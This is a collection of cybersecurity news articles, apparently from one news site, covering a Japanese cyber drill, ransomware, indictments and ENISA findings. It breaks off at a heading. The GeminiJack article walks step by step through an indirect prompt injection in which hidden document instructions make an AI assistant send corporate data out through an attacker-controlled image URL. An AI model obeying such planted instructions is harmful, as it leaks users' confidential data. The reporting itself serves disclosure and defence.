Japan is set to hold its first public-private sector tabletop exercise to prepare for large-scale cyberattacks, particularly targeting critical infrastructure. The drill, scheduled for December 18th, will involve the central government, the Tokyo metropolitan government, and major infrastructure operators across the capital region.  The exercise comes during multiple cyberattacks in Japan, which have increasingly targeted sectors essential to daily life and economic activity. By simulating infrastructure disruptions, officials aim to identify vulnerabilities and establish a coordinated public-private response framework.  The exercise is designed around a scenario in which a sudden, large-scale power outage of unknown origin hits the Tokyo metropolitan area. Participants will simulate cascading disruptions affecting water supply, telecommunications, internet services, traffic networks, and railway operations. The goal is to replicate the chain reactions that could occur if Japan's cyberattacks multiple systems simultaneously.  If power outages are prolonged, healthcare facilities could face urgent challenges, including the care of patients dependent on ventilators or dialysis machines. Similarly, persistent traffic congestion could delay fuel deliveries, including gasoline and diesel, with serious repercussions for everyday life and commercial activity. 

Collaboration Between Public and Private Sectors 

The cybersecurity drill will involve key infrastructure sectors in Tokyo, including electricity, gas, telecommunications, healthcare, and finance. The National Security Secretariat and the Tokyo metropolitan government are leading the exercise, with participation from major private-sector operators. Officials hope the exercise will clarify existing coordination challenges and strengthen preparedness for real-world incidents.  By conducting its first public-private cyber drill, Japan seeks not only to test operational readiness but also to reinforce collaboration between government agencies and private infrastructure operators. The simulation emphasizes the need for real-time communication, rapid decision-making, and coordinated measures to mitigate the impact of cyber incidents. 

Strengthening Japan’s Cyber Resilience 

This marks an important step in Japan’s response to cyberattacks, particularly as the country has faced a series of incidents targeting critical infrastructure in recent years. Experts note that Japan, with its highly interconnected urban infrastructure, is particularly vulnerable to cyberattacks that can trigger cascading failures.   Disruptions in one sector, such as electricity, can quickly affect water distribution, transportation networks, healthcare facilities, and financial services. The Tokyo metropolitan area, as the nation’s economic and political center, is especially critical in this context.  As Japan faces new cyber threats from highly skilled cyber actors, exercises such as this one in Tokyo are expected to become a regular component of national cybersecurity strategy. Officials believe that repeated drills will help identify gaps, improve response protocols, and enhance resilience against future cyberattacks on Japan’s essential infrastructure. 

Asahi Group Holdings Ltd. is weighing the creation of a dedicated cybersecurity unit as it continues to deal with the prolonged impact of a ransomware incident that struck the company in late September. The Asahi cyberattack disrupted core operations, delayed financial reporting, and exposed vulnerabilities in both the company’s internal systems and Japan’s broader corporate cyber defenses.  The cyberattack on Asahi occurred on September 29, when a system disruption was detected at approximately 7:00 a.m. Japan Standard Time. Subsequent investigations confirmed that files within the company’s network had been encrypted by ransomware. By around 11:00 a.m. the same day, Asahi disconnected its network and isolated its data center in an effort to contain the damage.  According to Asahi Group Holdings, the attacker gained unauthorized access through network equipment located at a Group facility. Ransomware was deployed simultaneously across multiple active servers, and some employee PC devices connected to the network. While the impact has been limited to systems managed in Japan, the disruption has been extensive. 

Shift Toward Zero-Trust Security Model 

Chief Executive Officer Atsushi Katsuki said the incident has prompted a fundamental reassessment of how information security is handled at the management level. As part of its recovery, Asahi Group Holdings has scrapped the use of virtual private networks and is adopting a stricter “zero-trust” model, which assumes no user or device inside the network can be automatically trusted.  “Information security is a management issue that should be given the highest priority,” Katsuki said. “We thought we had taken sufficient measures, which were easily broken. It made me realize there’s no limit to the precautions that can be taken.”  The Asahi cyberattack froze key business systems in Japan, forcing the company to shift order processing and shipments offline. The disruption hit at a critical time, delaying deliveries of year-end gift sets, a seasonal mainstay for the Japanese beverage market. As a result, November sales of beer and other alcoholic beverages fell by more than 20% compared with the same period a year earlier. 

Operational and Financial Fallout Continues 

Operational disruptions have gradually eased, but the effects on financial reporting remain significant. Asahi Group Holdings now expects its annual earnings disclosure to be delayed by more than 50 days. While partial third-quarter figures were released in November, Katsuki declined to set a new date for the full earnings announcement.  Before the cyberattack on Asahi, the company had forecast that operating profit for the year ending in December would decline 5.2% to ¥255 billion ($1.6 billion), on sales of ¥2.95 trillion. Once reporting resumes, Asahi plans to outline its growth strategy, with a particular focus on non-alcoholic and low-alcohol beverages, along with its investment plans.  Despite the setback, Katsuki said the breach does not threaten Asahi’s long-term foundation and expressed confidence that lost market share can be recovered. He expects most systems to be restored by February, with shelf space recovery and full competitive positioning returning from March. 

Data Exposure, Recovery Efforts, and Broader Implications 

In parallel with restoring operations, Asahi Group Holdings has been conducting a detailed forensic investigation in collaboration with external cybersecurity experts. In a statement released on November 27, 2025, the company disclosed that some data from company-issued PCs had been exposed and that personal information stored on servers may also have been affected. As of that date, there was no confirmation that server-based personal data had been published on the internet.  The investigation identified the following categories of personal information that have been or may have been exposed: data belonging to approximately 1.525 million individuals who contacted customer service centers of Asahi Breweries, Asahi Soft Drinks, and Asahi Group Foods; information related to 114,000 external contacts who received congratulatory or condolence telegrams; personal details of 107,000 employees and retirees; and information concerning 168,000 family members of employees and retirees. Asahi confirmed that no credit card information was included.  On November 26, Asahi submitted a final report to Japan’s Personal Information Protection Commission and stated that affected individuals will be notified in due course. A dedicated inquiry hotline was established to respond to questions related to personal data exposure.  System restoration efforts have taken roughly two months and have included containment of ransomware, integrity checks, and enhanced security measures. Asahi said systems and devices confirmed to be secure will be restored in phases, with ongoing monitoring to prevent recurrence. Preventive measures include redesigned network controls, stricter connection restrictions, enhanced threat detection, updated backup strategies, revised business continuity plans, and expanded employee training and external audits. 

A cyberattack on Russia has reportedly targeted Russia’s digital military draft system. According to Grigory Sverdlin, head of the draft-dodging nonprofit Idite Lesom, anonymous hackers successfully breached a key developer of the system on Thursday. “For the next few months, the system, which holds 30 million records, will not be able to send people off to kill or die,” Sverdlin wrote on Facebook.   He added that his organization had received a large set of documents from the hackers, including source code, technical documentation, and internal communications from Russia’s software provider Micord, a central developer of the digital military draft system. 

Cyberattack on Russia’s Digital Military Draft System 

Micord’s website was reportedly inaccessible on Thursday, displaying a notice that it was under “technical maintenance.” Meanwhile, the investigative outlet IStories, which obtained the documents from Idite Lesom, confirmed the breach with Micord’s director, Ramil Gabdrahmanov.  “Listen, it could happen to anyone. Many are being attacked right now,” Gabdrahmanov said. He declined to confirm whether Micord had worked on Russia’s unified military registration database, stating, “We work on many different projects.” Nonetheless, IStories independently verified Micord’s involvement in the digital registry.  Despite the cyberattack on Russia’s digital military draft system, some users reported that the database website was still accessible, though it remained unclear whether electronic draft summonses had been disrupted. The Russian Defense Ministry dismissed the claims of a breach as “fake news,” asserting that the registry continued to operate normally.   “The registry has been repeatedly subjected to hacking attacks. They have all been successfully repelled,” the ministry said, emphasizing that attempts to disrupt the system had so far “failed to achieve their objectives", reported IStories.

Digital Military Draft System: Modernizing Russia’s Draft Process 

The digital military draft system, part of a broader modernization of Russia’s wartime enlistment process, centralizes records of men aged 18 to 30 and allows authorities to issue summonses online, eliminating the need for in-person notifications.  The system has faced multiple delays, with its initial launch scheduled for November 2024. Russia’s fall 2025 draft, which runs from October 1 to December 31, was expected to rely on this digital registry in four regions, including Moscow.  Sverdlin noted that once fully operational, the online system automatically enforces restrictions on draftees who fail to report for compulsory service, including travel bans.  

Origins and Government Plans for the Unified Registry 

The hacker group reportedly remained in Micord’s system for several months, accessing critical infrastructure, operational correspondence, and the source code, which they claimed to have destroyed. The documents were shared with journalists at IStories, who confirmed their authenticity.  The Russian government first announced plans for a unified digital military registration registry in April 2023, when the State Duma passed a bill creating the system. RT Labs, a Rostelecom subsidiary, was initially named as one of the developers.   In February 2024, Rostelecom was designated as the sole contractor to complete the system for the Ministry of Digital Development, Communications, and Mass Media, with a completion deadline of December 31, 2024. Though initially intended for the 2024 fall draft, the registry became fully operational only in October 2025, with several regions adopting electronic summonses and phasing out paper notifications. 

Microsoft Corp. has announced a major update to its bug bounty program, extending coverage to include any vulnerability affecting its online services. This new framework, referred to as “In Scope By Default,” is an important shift in how the tech giant approaches coordinated vulnerability disclosure.  Under this updated model, every Microsoft online service is automatically eligible for bounty awards from the moment it launches. Previously, the company relied on product-specific scope definitions, which often caused confusion for security researchers and limited the range of vulnerabilities eligible for rewards. By making all services In Scope By Default, Microsoft aims to make participation in the bug bounty program more predictable while ensuring critical vulnerabilities are addressed and incentivized regardless of their origin.  A key feature of the expanded scope is its coverage of third-party and open-source components integrated into Microsoft services. This means that vulnerabilities in external libraries, dependencies, or open-source packages that power Microsoft’s cloud infrastructure are now eligible for bug bounty rewards, not just flaws in Microsoft’s own software. 

A Strategic Shift in Bug Bounty Security Incentives 

Tom Gallagher, vice president of engineering at the Microsoft Security Response Center (MSRC), highlighted the significance of the change in a December 11, 2025, blog post. He described it as more than an administrative adjustment, calling it a structural realignment designed to reflect real-world risk. Gallagher explained that by defaulting all services into scope, Microsoft hopes to reduce reporting delays, minimize confusion, and allow researchers to focus on vulnerabilities with meaningful impact on customers.  “If Microsoft’s online services are impacted by vulnerabilities in third-party code, including open source, we want to know,” Gallagher stated. “If no bounty award formerly exists to reward this vital work, we will offer one. This closes the gap for security research and raises the security bar for everyone who relies on this code.”  The new policy also allows Microsoft to collaborate more effectively with researchers on upstream or third-party vulnerabilities. The company can now assist with developing fixes or support maintainers when issues in external codebases directly affect Microsoft services. 

Industry Reaction and Expected Impact 

All new Microsoft online services now fall under bug bounty coverage from day one, while millions of existing endpoints no longer require manual approval to qualify. The update is designed to make it easier for security professionals to identify and report vulnerabilities across Microsoft’s expansive ecosystem.  The new approach aligns with Microsoft’s broader security philosophy in an AI- and cloud-first environment, where attackers exploit any weak link, regardless of ownership. According to Gallagher, “Security vulnerabilities often emerge at the seams where components interact or where dependencies are involved. We value research that takes this broader perspective, encompassing not only Microsoft infrastructure but also third-party dependencies, including commercial software and open-source components.”  Last year, Microsoft’s bug bounty program and its Zero Day Quest live-hacking event awarded over $17 million to researchers for high-impact discoveries. With the In Scope By Default initiative, the company expects to expand eligibility even further, particularly in areas involving Microsoft-owned domains, cloud services, and third-party or open-source code.  Researchers participating in the program are expected to follow Microsoft’s Rules of Engagement for Responsible Security Research, ensuring customer privacy and data protection while enabling coordinated vulnerability disclosure. By widening its bug bounty scope, Microsoft aims to raise the overall security bar. 

OpenAI has issued a cautionary statement that its forthcoming AI models could present “high” cybersecurity risks as their capabilities rapidly advance. The warning, published on Wednesday, noted the potential for these AI models to either develop zero-day exploits against well-defended systems or assist in enterprise or industrial intrusion operations with tangible real-world consequences.  The company, known for ChatGPT, explained that as AI capabilities grow, its models could reach levels where misuse might have an impact. OpenAI highlighted the dual-use nature of these technologies, noting that techniques used to strengthen defenses can also be repurposed for malicious operations. “As AI capabilities advance, we are investing in strengthening models for defensive cybersecurity tasks and creating tools that enable defenders to more easily perform workflows such as auditing code and patching vulnerabilities,” the blog post stated.  To mitigate these risks, OpenAI is implementing a multi-layered strategy involving access controls, infrastructure hardening, egress controls, monitoring, and ongoing threat intelligence efforts. These protection methods are designed to go alongside the threat landscape, ensuring a quick response to new risks while preserving the utility of AI models for defensive purposes. 

Assessing Cybersecurity Risks in AI Models 

OpenAI noted that the cybersecurity proficiency of its AI models has improved over recent months. Capabilities measured through capture-the-flag (CTF) challenges increased from 27% on GPT‑5 in August 2025 to 76% on GPT‑5.1-Codex-Max by November 2025. The company expects this trajectory to continue and is preparing scenarios in which future models could reach “High” cybersecurity levels, as defined by its internal Preparedness Framework.  These high-level models could, for instance, autonomously develop working zero-day exploits or assist in stealthy cyber intrusions. OpenAI emphasized that its approach to safeguards combines technical measures with careful governance of model access and application. The company aims to ensure that these AI capabilities strengthen security rather than lower barriers to misuse. 

Frontier Risk Council and Advisory Initiatives 

In addition to technical measures, OpenAI is establishing the Frontier Risk Council, an advisory group that will bring experienced cyber defenders and security practitioners into direct collaboration with its teams. Initially focusing on cybersecurity, the council will eventually expand to other frontier AI capability domains. Members will advise balancing useful, responsible capabilities with the potential for misuse, informing model evaluations. OpenAI is also exploring a trusted access program for qualifying users and customers working in cyber defense. This initiative aims to provide tiered access to enhanced AI capabilities while maintaining control over potential misuse.  Beyond these initiatives, OpenAI collaborates with global experts, red-teaming organizations, and the broader cybersecurity community to evaluate potential risks and improve safety measures. This includes end-to-end red teaming to simulate adversary attacks and detection systems designed to intercept unsafe activity, with escalation protocols combining automated and human review. 

Dual-Use Risks and Mitigation 

OpenAI stressed that cybersecurity capabilities in AI models are inherently dual-use, with offensive and defensive knowledge often overlapping. To manage this, the company employs a defense-in-depth strategy, layering protection methods such as access controls, monitoring, detection, and enforcement programs. Models are trained to refuse harmful requests while remaining effective for legitimate educational and defensive applications.  OpenAI also works through the Frontier Model Forum, a nonprofit initiative involving leading AI labs, to develop shared threat models and ecosystem-wide best practices. This collaborative approach aims to create a consistent understanding of potential attack vectors and mitigation strategies across the AI industry. 

Historical Context and Risk Management 

This recent warning aligns with OpenAI’s prior alerts regarding frontier risks. In April 2025, the company issued a similar caution concerning bioweapons risks, followed by the release of ChatGPT Agent in July 2025, which was assessed as “high” on risk levels. These measures reflect OpenAI’s ongoing commitment to evaluate and publicly disclose potential hazards from advanced AI capabilities.  The company’s updated Preparedness Framework categorizes AI capabilities according to risk and guides operational safeguards. It distinguishes between “High” capabilities, which could amplify existing pathways to severe harm, and “Critical” capabilities, which could create unprecedented risks. Each new AI model undergoes rigorous evaluation to ensure that it sufficiently minimizes risks before deployment. 

Google has addressed a Gemini zero-click security flaw that allows silent data extraction from corporate environments using the company’s AI assistant tools. The issue, identified as a vulnerability in Gemini Enterprise, was uncovered in June 2025 by researchers at Noma Security, who immediately reported it to Google.  The researchers named the flaw GeminiJack, describing it as an architectural weakness affecting both Google’s Gemini Enterprise, its suite of corporate AI assistant tools, and Vertex AI Search, which supports AI-driven search and recommendation functions on Google Cloud.  According to security researchers, the issue allowed a form of indirect prompt injection. Attackers could embed malicious instructions inside everyday documents stored or shared through Gmail, Google Calendar, Google Docs, or any other Workspace application that Gemini Enterprise had permission to access. When the system interacted with the poisoned content, it could be manipulated to exfiltrate sensitive information without the target's knowledge.  The defining trait of the attack was that it required no interaction from the victim. Researchers noted that exploiting Gemini zero-click behavior meant employees did not need to open links, click prompts, or override warnings. The attack also bypassed standard enterprise security controls. 

How the GeminiJack Attack Chain Worked 

Noma Security detailed several stages in the GeminiJack attack sequence, showing how minimal attacker effort could trigger high-impact consequences: 

1. Content Poisoning: An attacker creates a harmless-looking Google Doc, Calendar entry, or Gmail message. Hidden inside was a directive instructing Gemini Enterprise to locate sensitive terms within authorized Workspace data and embed those results into an image URL controlled by the attacker. 
2. Trigger: A regular employee performing a routine search could inadvertently cause the AI to fetch and process the tampered content. 
3. AI Execution: Once retrieved, Gemini misinterpreted the hidden instructions as legitimate. The system then scanned corporate Workspace data, based on its existing access permissions, for the specified sensitive information. 
4. Exfiltration: During its response, the AI inserted a malicious image tag. When the browser rendered that tag, it automatically transmitted the extracted data to the attacker's server using an ordinary HTTP request. This occurred without detection, sidestepping conventional defenses. 

Researchers explained that the flaw existed because Gemini Enterprise’s search function relies on Retrieval-Augmented Generation (RAG). RAG enables organizations to query multiple Workspace sources through pre-configured access settings.  “Organizations must pre-configure which data sources the RAG system can access,” the researchers noted. “Once configured, the system has persistent access to these data sources for all user queries.” They added that the vulnerability exploited “the trust boundary between user-controlled content in data sources and the AI model’s instruction processing.”  A step-by-step proof-of-concept for GeminiJack was published on December 8. 

Google’s Response and Industry Implications 

Google confirmed receiving the report in August 2025 and collaborated with the researchers to resolve the issue. The company issued updates modifying how Gemini Enterprise and Vertex AI Search interact with retrieval and indexing systems. Following the fix, Vertex AI Search was fully separated from Gemini Enterprise and no longer shares the same LLM-based workflows or RAG functionality.  Despite the patch, security researchers warned that similar indirect prompt-injection attacks could emerge as more organizations adopt AI systems with expansive access privileges. Traditional perimeter defenses, endpoint security products, and DLP tools, they noted, were “not designed to detect when your AI assistant becomes an exfiltration engine.”  “As AI agents gain broader access to corporate data and autonomy to act on instructions, the blast radius of a single vulnerability expands exponentially,” the researchers concluded. They advised organizations to reassess trust boundaries, strengthen monitoring, and stay up to date on AI security work. 

The U.S. Department of Justice has unveiled a series of actions against two Russian state-supported cyber collectives, CARR (also known as CyberArmyofRussia_Reborn or CyberArmyofRussia) and NoName057(16), with prosecutors unsealing dual indictments against Ukrainian national Victoria Eduardovna Dubranova, 33. Dubranova, known online as “Vika,” “Tory,” and “SovaSonya,” is accused of participating in destructive campaigns against critical infrastructure worldwide on behalf of Russian geopolitical objectives.  Dubranova was extradited to the United States earlier in 2025 on charges tied to CARR, and she has now been arraigned on a second indictment connected to NoName057(16). She pleaded not guilty in both proceedings. Trial in the NoName057(16) case is scheduled for February 3, 2026, while the CARR case is set for April 7, 2026. 

Russian Government Involvement 

According to prosecutors, both CARR and NoName057(16) operated with direct or indirect support from Moscow. CARR allegedly received Russian government funding used to acquire cyber tools, including subscriptions to DDoS-for-hire services. NoName057(16) was described as a covert, state-blessed endeavor tied to the Center for the Study and Network Monitoring of the Youth Environment (CISM), an IT organization established in 2018 by presidential order in Russia. Employees of that organization reportedly helped build NoName057(16)’s proprietary DDoS software, known as DDoSia.  [caption id="" align="alignnone" width="2048"] Notification of CARR and Z-Pentest Hackers (Source: Rewards for Justice)[/caption] Assistant Attorney General for National Security John A. Eisenberg said the enforcement effort demonstrates the Department’s commitment “to disrupting malicious Russian cyber activity, whether conducted directly by state actors or their criminal proxies,” emphasizing the need to defend key resources such as food and water systems.  First Assistant U.S. Attorney Bill Essayli warned that state-aligned hacktivist groups, including CARR and NoName057(16), pose serious national security concerns because they enable foreign intelligence services to obscure their involvement by using civilian proxies.  FBI Cyber Division Assistant Director Brett Leatherman stated that the Bureau will continue exposing and pursuing pro-Russia actors, including those with ties to the GRU. EPA Acting Assistant Administrator Craig Pritzlaff added that targeting water systems presents immediate hazards, pledging continued pursuit of individuals who threaten public resources. 

Cyber Army of Russia Reborn (CARR / CyberArmyofRussia) 

According to the indictments, CARR, also known as Z-Pentest and linked to CyberArmyofRussia, was created, funded, and directed by Russia’s GRU. The group has claimed responsibility for hundreds of global cyberattacks, including intrusions into U.S. critical infrastructure. CARR regularly published evidence of its operations on Telegram, where it amassed more than 75,000 followers and reportedly consisted of over 100 members, some of whom were juveniles.  The group allegedly targeted industrial control systems and carried out widespread DDoS attacks. Victims included public drinking water systems in multiple U.S. states, where operational disruptions led to the release of hundreds of thousands of gallons of drinking water. In November 2024, CARR allegedly attacked a meat processing plant in Los Angeles, causing thousands of pounds of meat to spoil and triggering an ammonia leak. The group also targeted election infrastructure and websites linked to nuclear regulatory bodies.  A figure known as “Cyber_1ce_Killer,” associated with at least one GRU officer, allegedly advised CARR on target selection and financed access to cybercriminal services. Dubranova faces charges including conspiracy to damage protected computers, tampering with public water systems, damaging protected computers, access device fraud, and aggravated identity theft. The statutory maximum penalty is 27 years in federal prison. 

NoName057(16) 

The indictment describes NoName057(16) as a clandestine project involving CISM personnel and external cyber actors. The group conducted hundreds of DDoS attacks in support of Russian interests, using its proprietary tool DDoSia. Participants worldwide were encouraged to run DDoSia, with rankings published on Telegram and cryptocurrency rewards doled out to top performers.  Targets included government agencies, ports, rail systems, financial institutions, and other high-value operations. For Dubranova, the NoName057(16) indictment carries a single charge of conspiracy to damage protected computers, with a maximum penalty of five years.  The law enforcement actions form part of Operation Red Circus, with coordination from Europol’s Operation Eastwood. In July 2025, investigators across 19 countries disrupted more than 100 servers linked to NoName057(16). Authorities also arrested two members outside Russia, announced charges against five individuals, and conducted searches of two service providers and 22 group members. The FBI also suspended the group’s primary X account. 

Rewards and Prior Sanctions 

The State Department simultaneously announced rewards of up to $2 million for information on CARR / CyberArmyofRussia members and up to $10 million for intelligence on NoName057(16) actors. A Joint Cybersecurity Advisory released by multiple U.S. agencies warned that Russian-aligned hacktivist groups exploit insecure VNC connections to access critical operational technology devices, a tactic linked to physical damage in several incidents.  Federal action against CARR is longstanding. On July 19, 2024, the Treasury Department sanctioned Yuliya Vladimirovna Pankratova and Denis Olegovich Degtyarenko for cyber operations targeting U.S. infrastructure. Degtyarenko was accused of accessing a SCADA system belonging to a U.S. energy company and developing training materials on exploiting similar systems.  CARR’s attacks escalated in late 2023 and throughout 2024, including manipulations of unsecured industrial systems across water, hydroelectric, wastewater, and energy facilities in the U.S. and Europe. Water utilities in Indiana, New Jersey, and Texas were among the affected sites, with one town forced into manual operations. In January 2024, CARR published a video showing interference with human-machine interfaces at a U.S. water utility. 

Recent data released by the National Crime Records Bureau (NCRB) paints a troubling picture of the rapid rise in cybercrime in India, particularly cases executed through mobile phones and computers.   The NCRB report notes that India recorded over 52,000 cybercrime incidents in 2021, a number that escalated to more than 86,000 by 2023. The Minister of State for Home Affairs, Bandi Sanjay Kumar, shared these figures in a written reply in the Rajya Sabha. 

Regional Trends Show Sharp Contrasts Across Northern India 

Haryana recorded 751 cybercrime cases in 2023, making it the highest among northern states, followed by Himachal Pradesh with 127 cases, a major jump from just 77 the previous year. Punjab, however, reported a decline, registering 511 cases in 2023 compared to 697 in 2022.  Among northern Union Territories, Delhi led with 407 cases, followed by Jammu & Kashmir with 185 and Chandigarh with 23. To strengthen cyber forensic capabilities, the Ministry of Home Affairs provided support to 20 states and UTs under the Nirbhaya-funded scheme. Punjab received ₹7.98 crore from 2018–19, while Himachal Pradesh received ₹7.29 crore. 

Ransomware Surge Places India and Asia-Pacific in a High-Risk Zone 

Beyond NCRB’s findings, rising digital threats in the Asia-Pacific region further illustrate the scale of cybercrime in India and neighboring countries. Cyble’s Monthly Threat Landscape Report: July 2025 reveals that India remains a priority target for ransomware groups. The Warlock ransomware group breached an India-based manufacturing firm, exfiltrating HR files, financial records, design archives, and internal repositories.   Additional leaks on dark web forums exposed stolen data from two Indian companies, a technology consulting firm and a subscription-based SaaS platform.  Unauthorized access to an Indian telecom network was also put up for sale for US$35,000, including credentials, CLI access, and operational network details. Regionally, Thailand, Japan, and Singapore each recorded six ransomware victims, with India and the Philippines close behind. The manufacturing, government, and critical infrastructure sectors faced the brunt of attacks. Meanwhile, South Asia witnessed hacktivist activity, with the pro-India Team Pelican Hackers claiming breaches of major Pakistani research and academic institutions.  Globally, July 2025 saw 423 ransomware victims, with the U.S. accounting for 223. Qilin ransomware topped global activity with 73 victims, followed by INC Ransom with 59. Cyble’s sensors also detected more than 1,000 daily attacks on U.S. industrial control systems, while the UK, Vietnam, China, Singapore, and Hong Kong recorded high targeting levels. A booming market for zero-day exploits added to the risk landscape, with vulnerabilities in WinRAR and leading VPN platforms being sold for USD $80,000 to 1 BTC. 

Insights from 2024 Call for Urgency of Cyber Preparedness 

Insights from the India Threat Landscape Report 2024 add critical context to the rising threat levels highlighted by the National Crime Records Bureau (NCRB). In the first half of 2024 alone, India recorded 593 cyberattacks, 388 data breaches, 107 data leaks, and 39 ransomware incidents, highlighting the need for stronger threat intelligence across tactical, operational, strategic, and technical layers.  Combined with Cyble’s observations on escalating ransomware activity, dark web exposure, and exploit markets, cybercrime in India is becoming the next big thing and demands a coordinated, intelligence-driven response.  Organizations seeking to stay protected from these threats can benefit from Cyble’s AI-powered threat intelligence ecosystem and autonomous security capabilities. Explore Cyble’s platform, experience Blaze AI, or schedule a free demo to strengthen your organization’s preparedness against modern-day cyber risks. 

Reporters Without Borders (RSF) has determined that a phishing operation targeting the organization in early 2025 was carried out by a group associated with Russia’s Federal Security Service (FSB). The RSF cyberattack conclusion follows a months-long technical investigation conducted with the support of French cybersecurity firm Sekoia.   According to RSF, the attempted RSF cyberattack was first identified in March 2025 when an employee received a message written in French that appeared to come from a trusted contact. The email requested the recipient to open an attachment that was, in fact, missing, an established phishing technique designed to prompt a reply, allowing attackers to later send infected documents or malicious links.  

The Failed RSF Cyberattack

When the response from the supposed sender arrived in English instead of French, the inconsistency raised immediate suspicion. The employee reported the exchange to RSF’s cybersecurity team, preventing the RSF cyberattack from progressing.  RSF then sought Sekoia’s assistance to conduct a deeper inquiry. The company later published a detailed account attributing the attack to the group known as Callisto or Calisto, also identified as UNC4057, Star Blizzard, or ColdRiver. Intelligence agencies in the United States, the United Kingdom, New Zealand, and Australia have connected this group to the FSB. Sekoia describes Callisto as an advanced persistent threat capable of maintaining hidden, long-term access to targeted information systems. 

Kremlin Pressure and Designation as an “Undesirable Organization” 

In its statement, Reporters Without Borders noted that the organization frequently faces digital interference from Russian state services and pro-Kremlin actors. RSF has long been involved in defending press freedom in Russia and supporting journalists fleeing the country, making it a recurring target of Russian-linked operations.  RSF Director of Advocacy and Assistance Antoine Bernard said the March attack was not accidental. “RSF, which defends global press freedom and actively assists Russian journalists fleeing their country, is a regular target of the Kremlin and the constellation surrounding Vladimir Putin’s regime,” he stated. Bernard added that this incident was one of multiple politically motivated operations directed at the organization in recent months. In August 2025, Russian authorities escalated their pressure by officially declaring RSF an “undesirable organization,” exposing anyone connected to it to prison sentences of up to four years under Russian law.  RSF Chief Information Security Officer Nicolas Diaz emphasized ongoing cybersecurity challenges. “In the face of cyberthreats, RSF benefits from cutting-edge technical solutions as well as external expertise capable of detecting and characterizing the cyberoperations that target us,” he explained. Diaz highlighted the need to strengthen cyber defense capabilities and ensure users recognize the subtle warning signs that often precede an attempted intrusion we saw in the RSF cyberattack.

Disinformation Campaigns and Broader Press Freedom Concerns 

RSF reported that the phishing operation fits into a larger pattern of attempts to undermine its work. In March 2025, the NGO denounced a disinformation campaign that used doctored videos falsely claiming to show statements by RSF leadership. A year earlier, in 2024, RSF filed a complaint against platform X (previously Twitter) after repeated posts containing disinformation against the organization remained unaddressed.   Among the most notable examples was a fabricated BBC-style video alleging that RSF had produced a study accusing Ukrainian soldiers of harboring Nazi sympathies. This false content was later circulated by Russian authorities and amplified by pro-Kremlin influencers.  The organization released its annual press freedom report, stating that Russia currently detains more foreign journalists than any other country. RSF also co-led an investigation into the final weeks of Ukrainian freelance journalist Viktoria Roshchyna, 27, who died in Russian captivity in 2024. According to the report, only Israel and organized crime groups were responsible for more journalist deaths worldwide in 2025. 

Four years after the HSE cyberattack that crippled Ireland’s national health service, the Health Service Executive has begun offering financial compensation to individuals whose personal data was compromised in the incident. The payment proposal is the first time the HSE has formally acknowledged the need to compensate those affected by what remains one of the largest recorded cyberattacks on health systems worldwide.  The cyberattack on HSE occurred on May 14, 2021, when the Conti ransomware group, a Russia-based cybercrime organization, launched a large-scale intrusion that forced the shutdown of the health service’s IT network. The ransomware incident led to widespread treatment delays and exposed sensitive information belonging to almost 100,000 staff members and patients. Investigators later determined that the breach began when a malicious file attached to a phishing email was opened on the dispersed and “frail” IT infrastructure used by the health service. 

Hundreds of Legal Proceedings Underway Following the HSE Cyberattack 

As legal disputes have grown over the last four years, the HSE has now extended an offer of €750 in damages to each affected claimant. A further €650 per person has been allocated to cover legal fees. According to Cork-based O’Dowd Solicitors, representing more than 100 individuals, the offer was received on Friday and was described to clients as a “significant development.” The firm told its clients that this was “the first time in public (or private that I know of, the HSE has acknowledged that they will need to compensate individuals impacted by the breach.”  According to RTÉ News, the proposed €750 payment would be issued within 28 days of an accepted offer and would serve as a “full and final settlement” of any ongoing proceedings. O’Dowd Solicitors declined to comment publicly on the matter, though it is understood the firm is currently advising clients on their options.  The offer follows a recent high-profile legal ruling in Ireland that affirmed an individual’s right to damages in relation to data breaches, a decision seen by legal observers as having implications for the mounting number of cases linked to the HSE cyberattack.  As of November 2025, the HSE confirmed that approximately 620 legal proceedings had been issued in connection with the attack. A spokeswoman said that the HSE “is working closely with the State Claims Agency in relation to this matter and is engaging with legal representatives accordingly,” adding that “these legal matters between the HSE and affected individuals are confidential.”  In earlier updates, the health service said it had reached out to all individuals whose information had been compromised, with 90,936 people ultimately contacted following the breach. The scale of the incident placed immense pressure on clinical operations, causing long delays in diagnostics, appointments, and elective procedures over an extended period. 

Cybersecurity Overhaul Following the Conti Attack 

Since the 2021 intrusion, the HSE has noted that it has “invested significantly” in strengthening its cybersecurity posture. According to the organization, multiple work programs are underway to address vulnerabilities identified in the aftermath of the cyberattack on HSE. The HSE reports that it now responds to thousands of cyber threats annually and continues to expand “multi-layered cyber defenses” intended to detect and mitigate ongoing risks. The agency acknowledges that the attack exposed critical weaknesses in its digital infrastructure and reiterated that enhancing cyber capability remains a core operational priority.  The compensation development was first reported by the Irish Independent and signals a new phase in the long-running fallout from the HSE cyberattack carried out by the Conti ransomware group. For many victims, the proposed payments represent a long-awaited acknowledgment of the breach’s impact, though the final resolution of the hundreds of legal claims still depends on individual acceptance of the settlement terms. 

The 6th edition of the NIS Investments report highlights a realignment in how organizations across the European Union allocate their cybersecurity investments, with funding steadily shifting from staffing toward technologies and outsourced services. The findings come from ENISA’s annual survey, which examines how EU cybersecurity policy, particularly the NIS2 Directive, translates into practice and influences operational decisions, resources, and long-term planning.  ENISA Executive Director Juhan Lepassaar highlighted the study’s importance, stating: “The NIS Investments Study provides insights, central to ENISA’s role to support EU Member States in building cyber resilience in critical sectors. The findings help us to better understand the challenges, target our support, and inform our recommendations for the future.”  For last year’s cycle, the survey gathered responses from 1,080 public and private organizations across all EU Member States. The sample represented sectors deemed highly critical under the NIS2 Directive.   Large enterprises made up 83% of respondents, while 17% were SMEs, allowing comparisons between organizations with very different resource structures. A detailed data companion was published alongside the main report, offering both sector-based and Member State views for deeper analysis. 

Cybersecurity Investment Becomes a Priority

Compared to last year, overall cybersecurity investments remained stable, averaging 9% of IT budgets with a median spend of 1.5 million euros. However, the data shows a clear pivot away from expanding internal cybersecurity teams and toward enhanced technology stacks and outsourced services. This shift marks one of the report’s central trends.  The cyber talent shortage remains a defining challenge across the EU. Organisations reported persistent difficulties in attracting (76%) and retaining (71%) cybersecurity professionals. High turnover, limited talent availability, and competitive hiring conditions continue to widen the workforce gap, prompting organizations to reassess staffing models and increase reliance on external support.  Compliance, especially related to NIS2, is still the main catalyst behind cybersecurity investments, cited by 70% of organizations. Yet the report notes that these efforts produce benefits beyond regulatory adherence. Respondents pointed to improvements in risk management (41%), detection capability (35%), and incident response (26%). Future investment priorities include upgrading cybersecurity tools, strengthening recovery processes, and improving internal skills development. 

NIS2 Implementation is Essential but Difficult 

